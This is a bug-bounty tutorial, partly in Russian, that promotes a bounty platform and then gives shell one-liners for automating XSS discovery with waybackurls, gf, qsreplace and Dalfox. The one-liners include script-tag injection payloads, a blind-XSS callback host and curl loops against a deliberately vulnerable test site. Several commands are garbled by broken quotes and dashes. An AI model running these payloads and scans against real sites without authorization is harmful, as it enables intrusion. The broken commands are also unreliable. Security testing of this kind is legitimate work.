Важное сообщение: сначала позвольте мне представить эту платформу вознаграждения за обнаружение ошибок, которую я нашел, и я влюблен в нее, она называется BugBeat (без насыщенных программ, без задержки ответа, +50 программ и т. д.):
Вот ссылка: https://bugbeat.tech
Давайте начнем :)
Автоматизируйте XSS, используя шаблоны Dalfox, WaybackURL, GF.
‹b› Убедитесь, что Go установлен на вашем компьютере ‹/b›
### Чтобы установить Go на свой компьютер:
1) sudo apt install -y golang 2) export GOROOT=/usr/lib/go 3) export GOPATH=$HOME/go 4) export PATH=$GOPATH/bin:$GOROOT/bin:$PATH 5) source .bashrc
## Как найти Blind XSS с помощью Dalfox?
- Use Waybackurls by Tomnomnom to Fetch URLS for Specific Target. - Use GF patterns to find Possible XSS Vulnerable Parameters. - Use Dalfox to find XSS.
Шаги:
waybackurls testphp.vulnweb.com | gf xss | sed 's/=.*/=/' | sort -u | tee Possible_xss.txt && cat Possible_xss.txt | dalfox -b blindxss.xss.ht pipe > output.txt
## Как найти отраженный XSS?
- Use Waybackurls by Tomnomnom to Fetch URLS for Specific Target. - Use qsreplace for Accept URLs on stdin, replace all query string values with a user-supplied value, only output each combination of query string parameters once per host and path.* Steps : waybackurls testphp.vulnweb.com| grep ‘=’ | qsreplace ‘“><script>alert(1)</script>’ | while read host do ; do curl -s — path-as-is — insecure “$host” | grep -qs “<script>alert(1)</script>” && echo “$host \033[0;31m” Vulnerable;done ``` ## Find the parameters which are not filtering special characters — One Liner ``` echo “test.url” | waybackurls | grep “=” | tee waybackurls.txt cat waybackruls | egrep -iv “.(jpg|jpeg|js|css|gif|tif|tiff|png|woff|woff2|ico|pdf|svg|txt)” | qsreplace ‘“><()’| tee combinedfuzz.json && cat combinedfuzz.json | while read host do ; do curl — silent — path-as-is — insecure “$host” | grep -qs “\”><()” && echo -e “$host \033[91m Vullnerable \e[0m \n” || echo -e “$host \033[92m Not Vulnerable \e[0m \n”; done | tee XSS.txt ```
## Ссылки для скачивания инструментов: -
1:- [Dalfox](https://github.com/hahwul/dalfox) * 2:- [Waybackurls](https://github.com/tomnomnom/waybackurls) * 3:- [GF](https://github.com/tomnomnom/gf) * 4:- [GF Patterns](https://github.com/1ndianl33t/Gf-Patterns) * 5:- [qsreplace](https://github.com/tomnomnom/qsreplace) Find Script here : [QuickXSS](https://github.com/theinfosecguy/QuickXSS)